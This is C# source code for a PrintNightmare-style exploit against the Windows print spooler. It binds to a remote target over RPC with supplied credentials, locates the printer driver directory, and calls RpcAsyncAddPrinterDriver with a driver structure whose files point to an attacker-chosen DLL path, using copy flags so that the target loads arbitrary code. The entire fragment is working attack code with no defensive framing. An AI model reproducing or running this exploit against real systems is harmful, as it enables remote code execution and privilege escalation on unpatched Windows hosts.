public static bool RunPrintNightmare(string target, string exploit_path, string authuser, string authdomain, string authpassword, int auth = DCSync.RPC_C_AUTHN_GSS_NEGOTIATE, string altservice = "host")
{
Console.WriteLine("[*] ");
rpcConn = DCSync.CreateBinding(target, altservice, auth, authuser, authdomain, authpassword, impersonationType: DCSync.RPC_C_IMP_LEVEL_DELEGATE);
if (rpcConn == IntPtr.Zero)
{
Console.WriteLine("Error CreateBinding");
return(false);
}
NTSTATUS rpcStatus = (NTSTATUS)RpcEpResolveBinding(rpcConn, GetClientInterface());
if (rpcStatus != NTSTATUS.Success)
{
Console.WriteLine("[x] Error RpcEpResolveBinding {0}", (int)rpcStatus);
return(false);
}
rpcStatus = (NTSTATUS)RpcBindingSetObject(rpcConn, ref PAR_ObjectUUID);
if (rpcStatus != NTSTATUS.Success)
{
Console.WriteLine("[x] Error RpcBindingSetOption {0}", (int)rpcStatus);
return(false);
}
string driverpath = FindDriverPath(rpcConn);
driverpath += "\\unidrv.dll";
Console.WriteLine("[*] DriverPath: {0}", driverpath);
string environment = "Windows x64";
DRIVER_INFO_2 dvi2 = new DRIVER_INFO_2
{
cVersion = 3,
pDataFile = exploit_path,
pEnvironment = environment,
pDriverPath = driverpath,
pName = RandomString(10)
};
if (AddPrinterDriver(dvi2, rpcConn, "C:\\Windows\\System32\\kernelbase.dll"))
{
dvi2.pName = RandomString(10);
string[] p = exploit_path.Split('\\');
if (AddPrinterDriver(dvi2, rpcConn, p[p.Length - 1]))
{
Console.WriteLine();
return(true);
}
}
return(false);
}
List <String> GetInstalledPrinterDrivers()
{
/*
* 'To determine the required buffer size,
* 'call EnumPrinterDrivers with cbBuffer set
* 'to zero. The call will fails specifying
* 'ERROR_INSUFFICIENT_BUFFER and filling in
* 'cbRequired with the required size, in bytes,
* 'of the buffer required to hold the array
* 'of structures and data.
*/
uint cbNeeded = 0;
uint cReturned = 0;
if (EnumPrinterDrivers(null, null, 2, IntPtr.Zero, 0, ref cbNeeded, ref cReturned))
{
//succeeds, but shouldn't, because buffer is zero (too small)!
throw new Exception("EnumPrinters should fail!");
}
int lastWin32Error = Marshal.GetLastWin32Error();
//ERROR_INSUFFICIENT_BUFFER = 122 expected, if not -> Exception
if (lastWin32Error != 122)
{
throw new Win32Exception(lastWin32Error);
}
IntPtr pAddr = Marshal.AllocHGlobal((int)cbNeeded);
if (EnumPrinterDrivers(null, null, 2, pAddr, cbNeeded, ref cbNeeded, ref cReturned))
{
DRIVER_INFO_2[] printerInfo2 = new DRIVER_INFO_2[cReturned];
int offset = pAddr.ToInt32();
Type type = typeof(DRIVER_INFO_2);
int increment = Marshal.SizeOf(type);
for (int i = 0; i < cReturned; i++)
{
printerInfo2[i] = (DRIVER_INFO_2)Marshal.PtrToStructure(new IntPtr(offset), type);
offset += increment;
}
Marshal.FreeHGlobal(pAddr);
List <String> result = new List <string>();
for (int i = 0; i < cReturned; i++)
{
result.Add(printerInfo2[i].pName);
}
return(result);
}
throw new Win32Exception(Marshal.GetLastWin32Error());
}
private static bool AddPrinterDriver(DRIVER_INFO_2 dvi2, IntPtr hBinding, string cfg)
{
DRIVER_CONTAINER container = new DRIVER_CONTAINER();
uint dwFlags = 0x00000010 | 0x8000; // APD_COPY_FROM_DIRECTORY | APD_INSTALL_WARNED_DRIVER;
container.Level = 2;
string sConfig = "";
if (cfg.IndexOf('\\') <= 0)
{
sConfig = string.Format("c:\\windows\\system32\\spool\\drivers\\x64\\3\\{0}", cfg);
dwFlags |= 0x00000008;// APD_COPY_NEW_FILES
}
else
{
sConfig = cfg;
dwFlags |= 0x00000004;// APD_COPY_ALL_FILES
}
dvi2.pConfigFile = sConfig;
Console.WriteLine("[!] ConfigFile: {0}", dvi2.pConfigFile);
IntPtr pDvi2 = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(DRIVER_INFO_2)));
Marshal.StructureToPtr(dvi2, pDvi2, false);
container.DriverInfo = pDvi2;
IntPtr pContainer = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(DRIVER_CONTAINER)));
Marshal.StructureToPtr(container, pContainer, false);
NTSTATUS ret = (NTSTATUS)RpcAsyncAddPrinterDriver(GetStubPtr(), GetProcStringPtr(116), hBinding, null, pContainer, dwFlags);
if (ret == NTSTATUS.Success)
{
Console.WriteLine("[*] OK!");
return(true);
}
else
{
Console.WriteLine("[x] KO! " + ret);
}
return(false);
}
